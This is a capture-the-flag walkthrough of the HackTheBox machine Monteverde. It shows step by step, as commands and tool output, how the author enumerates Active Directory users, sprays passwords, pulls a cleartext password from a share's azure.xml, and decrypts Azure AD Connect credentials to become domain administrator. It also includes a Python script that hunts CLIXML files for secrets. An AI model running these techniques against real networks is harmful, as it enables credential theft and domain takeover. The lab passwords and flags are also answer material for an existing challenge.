Monteverde
Medium Windows Active Directory box on HackTheBox

Reconnaissance
We start with a SYN scan of all 65535 TCP ports, running service/version detection and the default script set against whatever turns out to be open:
nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.042s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-03 12:12:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-08-03T12:13:31
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 3 13:14:12 2025 -- 1 IP address (1 host up) scanned in 122.19 seconds
The combination of open ports points to a Domain Controller: TCP 53 (DNS), 88 (Kerberos), 389/636 and 3268/3269 (LDAP and Global Catalog), 464 (kpasswd) and 445 (SMB) together only appear on a DC, and 5985 (WinRM) gives us a remote shell option once we have credentials.
The LDAP service lines also leak the domain name. nmap prints it as MEGABANK.LOCAL0., but the trailing "0." is an artifact of nmap's output; the real name is MEGABANK.LOCAL, so we add it to /etc/hosts.
Methodology matters more than any single tool, so we enumerate each service in order, starting with TCP 53 (DNS):
check whether any record contains something useful with dig, including a zone transfer attempt
dig @10.10.10.172 MEGABANK.LOCAL NS
...
dig @10.10.10.172 MEGABANK.LOCAL MX
...
dig @10.10.10.172 MEGABANK.LOCAL TXT
...
dig @10.10.10.172 MEGABANK.LOCAL AXFR
...
Nothing useful there, so on to TCP 88 (Kerberos). kerbrute tells valid from invalid usernames apart by the KDC's error code on a bare AS-REQ, which does not count as a failed logon against the lockout threshold, so it is safe to run with a large wordlist:
kerbrute userenum --dc 10.10.10.172 -d MEGABANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/03/25 - Ronnie Flathers @ropnop
2025/08/03 14:44:12 > Using KDC(s):
2025/08/03 14:44:12 > 10.10.10.172:88
2025/08/03 14:44:20 > [+] VALID USERNAME: administrator@MEGABANK.LOCAL
That confirms the administrator account. Next is MS-RPC with a NULL session through rpcclient (which reaches the SAMR interface over SMB named pipes on TCP 445 rather than the endpoint mapper on 135). That anonymous SAMR enumeration works at all on a Server 2019 DC is a finding in itself; a hardened DC rejects it:
rpcclient -U '' -N 10.10.10.172
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
rpcclient $> querydispinfo
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
rpcclient $>
We now have a list of valid users, which we save to a users.txt file (administrator first, then the accounts from rpcclient).
With valid usernames in hand, the first cheap check is AS-REP roasting.
Normally the KDC refuses to issue a ticket until the client proves knowledge of the password through pre-authentication (an encrypted timestamp in the AS-REQ). If an account has "Do not require Kerberos preauthentication" set (userAccountControl bit 0x400000, UF_DONT_REQUIRE_PREAUTH), the KDC answers a bare AS-REQ with an AS-REP whose encrypted part is keyed with a key derived from that user's password, so anyone who knows the username gets a blob to crack offline.
The attack applies exactly when you have candidate usernames but no credentials, which is our situation, so we request AS-REPs for every name in users.txt with impacket-GetNPUsers:
impacket-GetNPUsers MEGABANK.LOCAL/ -no-pass -usersfile users.txt -format john
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
Nothing to roast: every account enforces pre-authentication. The KDC_ERR_CLIENT_REVOKED line belongs to Guest, which is disabled (its acb value 0x215 carries the 0x1 DISABLED bit), and the final "invalid principal syntax" most likely comes from an empty line at the end of users.txt.
On to TCP 445 (SMB) with NetExec (the successor of CrackMapExec); an anonymous LDAP bind gives nothing further either.
netexec smb 10.10.10.172 -u '' -p '' --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.10.10.172 445 MONTEVERDE [-] Error enumerating shares: STATUS_ACCESS_DENIED
netexec smb 10.10.10.172 -u '' -p '' --users
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.10.10.172 445 MONTEVERDE -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.172 445 MONTEVERDE Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.172 445 MONTEVERDE AAD_987d7f2f57d2 2020-01-02 22:53:24 0 Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
SMB 10.10.10.172 445 MONTEVERDE mhope 2020-01-02 23:40:05 0
SMB 10.10.10.172 445 MONTEVERDE SABatchJobs 2020-01-03 12:48:46 0
SMB 10.10.10.172 445 MONTEVERDE svc-ata 2020-01-03 12:58:31 0
SMB 10.10.10.172 445 MONTEVERDE svc-bexec 2020-01-03 12:59:55 0
SMB 10.10.10.172 445 MONTEVERDE svc-netapp 2020-01-03 13:01:42 0
SMB 10.10.10.172 445 MONTEVERDE dgalanos 2020-01-03 13:06:10 0
SMB 10.10.10.172 445 MONTEVERDE roleary 2020-01-03 13:08:05 0
SMB 10.10.10.172 445 MONTEVERDE smorgan 2020-01-03 13:09:21 0
SMB 10.10.10.172 445 MONTEVERDE [*] Enumerated 10 local users: MEGABANK
Users as passwords
Nothing new compared to the RPC enumeration. Before anything heavier, check whether any account uses its own username as its password; it is cheap, and it happens on real engagements too. Pair each line of users.txt with itself (--no-bruteforce) instead of trying every user against every candidate, so each account gets exactly one attempt and the lockout threshold is never at risk, and keep going after a hit (--continue-on-success):
netexec smb 10.10.10.172 -u users.txt -p users.txt --no-bruteforce --continue-on-success --shares
---------------- SNIP -----------------
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Enumerated shares
SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark
SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------
SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ
SMB 10.10.10.172 445 MONTEVERDE C$ Default share
SMB 10.10.10.172 445 MONTEVERDE E$ Default share
SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE users$ READ
Success: SABatchJobs uses SABatchJobs as its password. The same output lists the shares that account can read (azure_uploads, users$, plus the default NETLOGON and SYSVOL), so we walk them with smbclient looking for anything interesting, starting with users$:
smbclient -U 'SABatchJobs' //10.10.10.172/users$
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
-------- SNIP ----------
The mhope folder inside users$ contains azure.xml, a PowerShell CLIXML serialization (the format Export-Clixml writes) of an Azure AD credential object:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
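The file is CLIXML, the format Export-Clixml writes. Export-Clixml protects SecureString properties (serialized as `<SS>`) with the exporting user's DPAPI key, so they are only recoverable as that user on that machine, but a property serialized as a plain .NET string, which is what this PSADPasswordCredential's Password is, lands in an `<S>` element in the clear. The parser below is an added example of mine, not part of the writeup; it walks a CLIXML document and reports every secret-looking string property, distinguishing the two cases. Its input is a constructed sample that mirrors azure.xml with a placeholder password, next to a PSCredential saved with Export-Clixml (the DPAPI blob is made up).

```python
import xml.etree.ElementTree as ET

PS = "{http://schemas.microsoft.com/powershell/2004/04}"
# Property names that usually hold a secret; extend for your target.
SENSITIVE = ("password", "secret", "token", "apikey", "clientsecret")


def find_secrets(clixml: str) -> list[dict]:
    """Walk a CLIXML document and report every string-typed property whose
    name looks like a secret, noting whether it is an <S> (plain string, stored
    as typed) or an <SS> (SecureString, DPAPI-protected on export)."""
    root = ET.fromstring(clixml)
    hits = []
    for obj in root.iter(PS + "Obj"):
        tn = obj.find(PS + "TN")
        # The first <T> under <TN> is the most specific .NET type name.
        type_name = tn.find(PS + "T").text if tn is not None else "(unknown)"
        props = obj.find(PS + "Props")
        if props is None:
            continue
        for prop in props:
            tag = prop.tag.replace(PS, "")
            name = prop.get("N", "")
            if tag not in ("S", "SS") or not any(k in name.lower() for k in SENSITIVE):
                continue
            hits.append({
                "type": type_name,
                "property": name,
                "protected": tag == "SS",
                "value": (prop.text or "").strip(),
            })
    return hits


# Constructed sample: a PSADPasswordCredential shaped like users$\mhope\azure.xml
# (placeholder password), followed by a PSCredential written by Export-Clixml,
# whose Password is a SecureString and therefore a DPAPI blob (value made up).
SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">Example-Plaintext-Secret-1!</S>
    </Props>
  </Obj>
  <Obj RefId="1">
    <TN RefId="1">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <S N="UserName">MEGABANK\\svc-example</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0000000000</SS>
    </Props>
  </Obj>
</Objs>
"""

if __name__ == "__main__":
    for hit in find_secrets(SAMPLE):
        state = "DPAPI-protected SecureString" if hit["protected"] else "CLEARTEXT"
        print(f"{hit['type']}.{hit['property']}: {state}: {hit['value']}")
```

Point it at any *.xml dropped on a share or in a user profile; the cleartext hits are immediately usable, the `<SS>` ones only matter if you can run as the exporting user on the exporting host (Import-Clixml there decrypts them for you).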
Password Spraying
A cleartext password: 4n0therD4y@n0th3r$. It was issued for an Azure AD service principal, but people reuse passwords, so we spray it against every domain user with kerbrute. One password against many accounts costs each account a single bad-password attempt, far below any sane lockout threshold, but on a real network read the policy first (netexec's --pass-pol) before spraying.
kerbrute passwordspray -d MEGABANK.LOCAL --dc 10.10.10.172 users.txt '4n0therD4y@n0th3r$'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/03/25 - Ronnie Flathers @ropnop
2025/08/03 14:59:57 > Using KDC(s):
2025/08/03 14:59:57 > 10.10.10.172:88
2025/08/03 14:59:57 > [+] VALID LOGIN: mhope@MEGABANK.LOCAL:4n0therD4y@n0th3r$
2025/08/03 14:59:57 > Done! Tested 11 logins (1 successes) in 0.140 seconds
The password is valid for mhope. NetExec's winrm module confirms the account can log on over WinRM; the (Pwn3d!) marker means we can run commands, not just authenticate:
netexec winrm 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
WINRM 10.10.10.172 5985 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
So we get an interactive session with Evil-WinRM (quote the password; it contains shell metacharacters):
evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
Privilege Escalation
With a bit of enumeration using whoami /all we notice some useful information:
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Two things stand out: membership in Remote Management Users, which is why WinRM works, and membership in MEGABANK\Azure Admins. The domain itself is not hosted in Azure; the group name suggests this DC runs Azure AD Connect to synchronise the on-premises directory to Azure AD. A look at C:\Program Files
confirms it:
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
------------ SNIP -----------
Microsoft Azure AD Sync Abuse
Azure AD Connect stores the credentials of the on-premises account it synchronises with (the AD DS connector account) in its ADSync SQL database, encrypted with keys that the product's own mcrypt.dll can unwrap. Anyone who can read that database and load the key set, here members of Azure Admins, can recover the connector account's cleartext password.
On this box the connector account is the domain Administrator. In real deployments it is usually a dedicated account, but password hash sync requires it to hold "Replicating Directory Changes" rights, which is DCSync, so it is a tier-0 credential either way.
The technique was published in fox-it/adconnectdump; VbScrub's AdSyncDecrypt packages it into a single executable that we use here.
Download AdDecrypt.zip
wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
Unzip it and upload both files it contains, AdDecrypt.exe and mcrypt.dll, to the target
*Evil-WinRM* PS C:\Temp> upload mcrypt.dll
*Evil-WinRM* PS C:\Temp> upload AdDecrypt.exe
AdDecrypt.exe has to be started with the ADSync Bin directory as the working directory, because it loads several of the product's DLLs from that folder and fails anywhere else; the executable itself can stay in C:\Temp. The -FullSQL switch tells it that this install uses a full SQL Server instance rather than the LocalDB default:
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
C:\Temp\AdDecrypt.exe -FullSQL
Running it returns the connector account's cleartext password:
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Temp\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
Now we log in as administrator with d0m@in4dminyeah! through Evil-WinRM and collect both flags (the password is quoted because of the trailing "!"):
evil-winrm -i 10.10.10.172 -u 'administrator' -p 'd0m@in4dminyeah!'
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
b57c55ed9a0d5b2fb99ec3296b5ea216
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\mhope\Desktop\user.txt
130d0c9981e480b6dda335b9a35ae948
Overall a realistic and interesting box, recommended when studying for the OSCP or eCPPTv3. Thank you for reading this write-up and see you next time <3!!